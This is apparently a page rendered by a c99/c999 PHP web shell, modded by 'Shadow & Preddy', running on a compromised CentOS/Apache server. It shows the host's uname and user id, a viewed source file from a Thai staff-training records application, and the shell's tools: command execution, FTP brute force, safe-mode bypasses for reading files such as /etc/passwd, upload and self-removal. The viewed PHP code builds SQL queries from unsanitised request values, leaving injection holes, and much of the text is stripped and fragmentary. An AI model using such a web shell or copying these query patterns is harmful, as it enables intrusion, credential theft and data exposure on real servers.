!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/develop_person_depart/   drwxr-xr-x
Free 52.63 GB of 127.8 GB (41.18%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     SearchDev_03.php (26.75 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
";
		echo "

กรุณาทำการ Login ก่อน
";
		echo "";
		exit();
	} 
	else {
	
	/**  Configuration  */
	include( "../configuration.php" );
	require_once( $_Config_absolute_path . "/includes/framework.php" );
	require_once( $_Config_absolute_path . "/include/Function.php" );

	/**  Create Database Object  */
	$dbObj = new DBConn;
	
	/**  Config Table for This Page  */
	$myTable = "training_tb";
	$myTablePK = "Date_start";
	$myTableField1 = "Date_start";
	$myTableField2 = "Training_name";
	

	/**  Paging */
	$page = $_GET['page'];
	if( $page == "" ) { $page = 1; }
	
	/**  Keyword and Field */
	$keyword = $_REQUEST['keyword'];
	$selectTypeBook = $_REQUEST['selectTypeBook'];
	
	/**  จำนวนข้อมูล ต่อ 1 หน้า  */
	$perpage = $_REQUEST['perpage'];
	if( $perpage == "" ) { $perpage = 200; }
	
	if( $Year == "" )
		$Year = date("Y")-543;
		
	//**  Parameter  */
	$param = "keyword=$keyword&selectTypeBook=$selectTypeBook"; 
	
	} #else
?>




<?=$_Config_sitename;?> - ข้อมูลงานสารบรรณ - ข้อมูลรายการหนังสือรับ-ส่ง










  

    
    
    = '".dmyE2ymdT($_REQUEST['dateStart'])."'  AND Date_finish <= '".dmyE2ymdT($_REQUEST['dateFinish'])."'  Group  By    training_tb.Teacher_code  ";
			}
			else{
				$query = "  SELECT  *, prefixName as First_name  FROM personal_tb LEFT JOIN prefix ON personal_tb.First_name = prefix.prefixId  LEFT JOIN  training_tb  ON training_tb.Teacher_code=personal_tb.Teacher_code  Where  personal_tb.StatusId='1'  and  personal_tb.Teacher_type='$Teacher_type'  Group  By   training_tb.Teacher_code   ";
			}
		}
		$result = $dbObj->execQuery($query);
		$numrows = $dbObj->_numrows;
		//echo $query;
		
		/**  Paging  */
		$display = ( !isset ($_GET['page']) ) ? 1 : $_GET['page'];
		$start = ( ($display * $limit) - $limit );
		/**  Paging  */
		
		if( $keyword != "" ) { 
			if( $selectTypeBook != "" ) { 
				if( isset($_GET['OrderBy']) ) {
					switch( $selectTypeBook ) {
						case 1 :
							$query = " SELECT *  FROM $myTable  WHERE  $myTableField1 LIKE '%$keyword%'  
											   ORDER BY  $OrderBy  $ASCDESC ";
							break;
						case 2 :
							$query = " SELECT *  FROM $myTable  WHERE   $myTableField2 LIKE '%$keyword%'  
											   ORDER BY  $OrderBy  $ASCDESC ";
							break;
						case 3 :
							$query = " SELECT *  FROM $myTable  WHERE   $myTableField3 LIKE '%$keyword%'  
											   ORDER BY  $OrderBy  $ASCDESC ";
							break;
						case 4 :
							$query = " SELECT *  FROM $myTable  WHERE   $myTableField4 LIKE '%$keyword%'  
											   ORDER BY  $OrderBy  $ASCDESC ";
							break;
						case 5 :
							$query = " SELECT *  FROM $myTable  WHERE   $myTableField5 LIKE '%$keyword%'  
											   ORDER BY  $OrderBy  $ASCDESC ";
							break;
					} # switch
				} # if
				elseif( !isset($_GET['OrderBy']) ) {
					switch( $selectTypeBook ) {
						case 1 :
							$query = " SELECT *  FROM $myTable  WHERE   $myTableField1 LIKE '%$keyword%'  
							  ORDER BY $myTablePK  ASC ";
							break;
						case 2 :
							$query = " SELECT *  FROM $myTable  WHERE   $myTableField2 LIKE '%$keyword%'  
							ORDER BY $myTablePK  ASC ";
							break;
						case 3 :
							$query = " SELECT *  FROM $myTable  WHERE   $myTableField3 LIKE '%$keyword%'  
							ORDER BY $myTablePK  ASC ";
							break;
						case 4 :
							$query = " SELECT *  FROM $myTable  WHERE   $myTableField4 LIKE '%$keyword%'  
							ORDER BY $myTablePK  ASC ";
							break;
						case 5 :
							$query = " SELECT *  FROM $myTable  WHERE   $myTableField5 LIKE '%$keyword%'  
							ORDER BY $myTablePK  ASC ";
							break;
					} # switch
				} # elseif
			} else {  // หาเฉพาะที่ใส่ Keyword
				if( isset($_GET['OrderBy']) ) {
					$query = "  SELECT  *, prefixName as First_name  FROM personal_tb LEFT JOIN prefix ON personal_tb.First_name = prefix.prefixId  LEFT JOIN  training_tb  ON training_tb.Teacher_code=personal_tb.Teacher_code    WHERE   personal_tb.StatusId='1'   and  personal_tb.Teacher_type='$Teacher_type'  and   ( $myTableField1 LIKE '%$keyword%'    OR  $myTableField2 LIKE '%$keyword%'  OR  $myTableField3 LIKE '%$keyword%'  OR  $myTableField4 LIKE '%$keyword%'    OR  $myTableField5 LIKE '%$keyword%' )  Group  By   training_tb.Teacher_code  ORDER BY  $OrderBy  $ASCDESC ";
				} 
				elseif( !isset($_GET['OrderBy']) ) {
					$query = "  SELECT  *, prefixName as First_name  FROM personal_tb LEFT JOIN prefix ON personal_tb.First_name = prefix.prefixId  LEFT JOIN  training_tb  ON  training_tb.Teacher_code=personal_tb.Teacher_code    WHERE   personal_tb.StatusId='1'   and  personal_tb.Teacher_type='$Teacher_type'  and    ( $myTableField1 LIKE '%$keyword%'   OR  $myTableField2 LIKE '%$keyword%'  OR  $myTableField3 LIKE '%$keyword%'  OR  $myTableField4 LIKE '%$keyword%'   OR  $myTableField5 LIKE '%$keyword%' )   Group  By    training_tb.Teacher_code  ORDER BY  Date_start  ASC ";
				}
			} # else
		} else {
			if( isset($_GET['OrderBy']) ) {
				$query = "  SELECT  *, prefixName as First_name  FROM personal_tb LEFT JOIN prefix ON personal_tb.First_name = prefix.prefixId  LEFT JOIN  training_tb  ON  training_tb.Teacher_code=personal_tb.Teacher_code  Where   personal_tb.StatusId='1'   and  personal_tb.Teacher_type='$Teacher_type'   Group  By    training_tb.Teacher_code  ORDER BY  $OrderBy  $ASCDESC ";
				
			} 
			elseif( !isset($_GET['OrderBy']) ) {
				$query = " SELECT  *, prefixName as First_name  FROM personal_tb LEFT JOIN prefix ON personal_tb.First_name = prefix.prefixId  LEFT JOIN  training_tb  ON training_tb.Teacher_code=personal_tb.Teacher_code  WHERE  personal_tb.StatusId='1'   and  personal_tb.Teacher_type='$Teacher_type'  and  Date_start >= '".dmyE2ymdT($_REQUEST['dateStart'])."'  AND Date_finish <= '".dmyE2ymdT($_REQUEST['dateFinish'])."'  Group  By   training_tb.Teacher_code  ORDER BY  Date_start  ASC ";
			} # elseif
		} # else
		$query .= " LIMIT $start, $limit ";
		$result = $dbObj->execQuery($query);
    ?>
     
">หน้าหลัก">ข้อมูลรายงานค้นหาข้อมูลเนื้อหาสาระรายด้าน

     

      

        
      

      

        

          

            
          

          

              ‹ ย้อนกลับ
          

          

            
          

          

            ทั้งหมด: 
              
             รายการ
            จำนวนข้อมูลต่อหน้า
              
          

          

             
            เลือกสายงาน
              
          

        

      

      

         0 ) { ?>
          

            

              
					  	

					  		

								ค้นหา  ตั้งแต่วันที่
					  			
					  			  ถึงวันที่
					  			
			  		  			  
			  		  			 
							

			  			

			  		
            

          

          fetchArray($result) ) { 
				
				$bgColor = ( $bgColor == "#FFFFFF" ) ? "#F9FBFB" : "#FFFFFF";
			
				
			
          ?>
            

            

               
               
              จำนวนครั้งเนื้อหาสาระรายด้าน
            

            

              No
              รายการ
              การอบรม
              การศึกษา

                ดูงาน		
              ประชุม
               สัมมนา
              นิเทศงาน
              วิทยากร
              กรรมการ

                วิชาการ/

                วิชาชีพ		
              ที่ปรึกษา

                งานวิจัย

                หรือวิทยา

                นิพนธ์		
              ผู้ทรงคุณ

                วุฒิ/เชี่ยวชาญ

                ตรวจเครื่องมือ		
              อื่นๆ
            

            

              
              
                
                 
                
                
              
                = '".dmyE2ymdT($_REQUEST['dateStart'])."'  AND Date_finish <= '".dmyE2ymdT($_REQUEST['dateFinish'])."'  and   Teacher_code='$rs[Teacher_code]'  and Training_type ='1'   ";   
				$result3 = $dbObj->execQuery($sql3);
				$rs3 = $dbObj->fetchArray($result3);
					echo number_format($rs3['Sum'],2,'.',','); 
			?>
              
              
                = '".dmyE2ymdT($_REQUEST['dateStart'])."'  AND Date_finish <= '".dmyE2ymdT($_REQUEST['dateFinish'])."'  and   Teacher_code='$rs[Teacher_code]'  and Training_type ='2'  ";   
				$result3 = $dbObj->execQuery($sql3);
				$rs3 = $dbObj->fetchArray($result3);
					echo number_format($rs3['Sum'],2,'.',','); 
			?>
              
              
                = '".dmyE2ymdT($_REQUEST['dateStart'])."'  AND Date_finish <= '".dmyE2ymdT($_REQUEST['dateFinish'])."'  and   Teacher_code='$rs[Teacher_code]' and Training_type ='3'   ";   
				$result3 = $dbObj->execQuery($sql3);
				$rs3 = $dbObj->fetchArray($result3);
					echo number_format($rs3['Sum'],2,'.',','); 
			?>
              
              
                = '".dmyE2ymdT($_REQUEST['dateStart'])."'  AND Date_finish <= '".dmyE2ymdT($_REQUEST['dateFinish'])."'  and   Teacher_code='$rs[Teacher_code]' and Training_type ='4'  ";   
				$result3 = $dbObj->execQuery($sql3);
				$rs3 = $dbObj->fetchArray($result3);
					echo number_format($rs3['Sum'],2,'.',','); 
			?>
              
              
                = '".dmyE2ymdT($_REQUEST['dateStart'])."'  AND Date_finish <= '".dmyE2ymdT($_REQUEST['dateFinish'])."'  and   Teacher_code='$rs[Teacher_code]'  and Training_type ='5'   ";   
				$result3 = $dbObj->execQuery($sql3);
				$rs3 = $dbObj->fetchArray($result3);
					echo number_format($rs3['Sum'],2,'.',','); 
			?>
              
              
                = '".dmyE2ymdT($_REQUEST['dateStart'])."'  AND Date_finish <= '".dmyE2ymdT($_REQUEST['dateFinish'])."' and   Teacher_code='$rs[Teacher_code]'  and Training_type ='7'  ";   
			$result3 = $dbObj->execQuery($sql3);
				$rs3 = $dbObj->fetchArray($result3);
					echo number_format($rs3['Sum'],2,'.',','); 
			?>
              
              
                = '".dmyE2ymdT($_REQUEST['dateStart'])."'  AND Date_finish <= '".dmyE2ymdT($_REQUEST['dateFinish'])."'  and   Teacher_code='$rs[Teacher_code]'  and Training_type ='8' ";   
				$result3 = $dbObj->execQuery($sql3);
				$rs3 = $dbObj->fetchArray($result3);
					echo number_format($rs3['Sum'],2,'.',','); 
			?>
              
              
                = '".dmyE2ymdT($_REQUEST['dateStart'])."'  AND Date_finish <= '".dmyE2ymdT($_REQUEST['dateFinish'])."'  and   Teacher_code='$rs[Teacher_code]'  and Training_type ='8' ";   
				$result3 = $dbObj->execQuery($sql3);
				$rs3 = $dbObj->fetchArray($result3);
					echo number_format($rs3['Sum'],2,'.',','); 
			?>
              
              
                = '".dmyE2ymdT($_REQUEST['dateStart'])."'  AND Date_finish <= '".dmyE2ymdT($_REQUEST['dateFinish'])."'  and   Teacher_code='$rs[Teacher_code]'  and Training_type ='10' ";   
				$result3 = $dbObj->execQuery($sql3);
				$rs3 = $dbObj->fetchArray($result3);
					echo number_format($rs3['Sum'],2,'.',','); 
			?>
              
              
                = '".dmyE2ymdT($_REQUEST['dateStart'])."'  AND Date_finish <= '".dmyE2ymdT($_REQUEST['dateFinish'])."'  and   Teacher_code='$rs[Teacher_code]'  and Training_type ='11' ";   
				$result3 = $dbObj->execQuery($sql3);
				$rs3 = $dbObj->fetchArray($result3);
					echo number_format($rs3['Sum'],2,'.',','); 
			?>
              
            

            
          

          
        

          

            ไม่พบรายการที่ค้นหา

              กรุณาลองใหม่อีกครั้ง


              		
          

        

        
        

          

             0 ) { ?>
              

                

                  
                

                

                  หน้า:
                     1) {	
                            $previous = $display - 1;					

                    ?>
                    
bool(false)




:: Command execute ::


Enter:  
Select: 
 






:: Shadow's tricks :D  ::



  

    
Useful Commands 
    

    

      

        
        
          
        
         
        
          

        Warning. Kernel may be alerted using higher levels 

    

    

  

   
Kernel Info: 

      
      
	  
	  
	  
	  
    

    







:: Preddy's tricks :D  ::



  

    
Php Safe-Mode Bypass (Read Files)
    


    

      

      File:  

 eg: /etc/passwd

      
      
      
           
      
      
      	
	
          

      

    

    

  

   
Php Safe-Mode Bypass (List Directories):     

      


      Dir:  

 eg: /etc/


    

    








 
:: Search ::
  - regexp 

 
:: Upload ::
 
[ ok ]






:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]


:: Go Dir ::
 
:: Go File ::
 


--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0055 ]--